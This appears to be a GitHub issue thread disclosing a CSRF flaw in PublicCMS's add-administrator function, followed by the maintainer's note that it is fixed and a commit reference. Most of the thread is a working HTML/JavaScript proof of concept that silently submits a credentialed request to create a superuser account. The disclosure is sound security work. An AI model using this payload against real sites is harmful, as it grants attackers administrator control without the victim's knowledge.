There is a CSRF vulnerability that can add the administrator account

[jearyorg]

The Add administrator Function is not check referer and token

POC:

<html>
  <!-- CSRF PoC  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/127.0.0.1:8080\/publiccms\/admin\/sysUser\/save.do?callbackType=closeCurrent&navTabId=sysUser\/list", true);
        xhr.setRequestHeader("Accept", "application\/json, text\/javascript, *\/*; q=0.01");
        xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.9,en;q=0.8");
        xhr.withCredentials = true;
        var body = "id=&name=testvul&superuserAccess=on&deptId=1&deptName=%E6%8A%80%E6%9C%AF%E9%83%A8&password=123456&repassword=123456&nickName=testvul&email=test%40gmail.com&roleIds=1";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

Building a page and inducing administrator access can add a user with super privileges.

[sanluan]

fixed in develop branch

[attritionorg]

@sanluan Can you link to the fixing commit please?

[sanluan]

@attritionorg 1604eb0

[attritionorg]

@sanluan Thank you!